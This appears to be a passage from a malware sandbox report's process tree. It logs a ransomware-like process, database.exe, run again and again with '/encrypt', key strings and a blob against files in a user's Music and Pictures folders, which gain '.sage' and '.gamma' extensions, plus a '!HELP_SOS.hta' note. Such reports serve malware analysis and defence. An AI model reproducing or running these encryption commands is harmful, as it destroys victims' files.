  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendUpdate.pub.id-DA208E5B.[[email protected]].gamma.gif"
  5⤵
    PID:2104
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\TracePing.potm.sage.gif"
  5⤵
  • System Network Configuration Discovery: Internet Connection Discovery
    PID:5404
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\TraceSwitch.eps.sage.gif"
  5⤵
    PID:1716
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UnblockClose.odp.sage.gif"
  5⤵
    PID:7096
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UnprotectWait.mhtml.sage.gif"
  5⤵
    PID:4320
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UpdateExport.mpa.sage.gif"
  5⤵
    PID:4324
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\xY3tbcbQ-SrCNfD0Q.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ApproveCheckpoint.emf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\CheckpointRegister.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ClearEdit.tiff.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\CompressAssert.pcx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\DenyBlock.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\EnableWait.dxf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\GroupRedo.raw.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\LimitExport.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\LockPublish.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\MergeReset.emf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
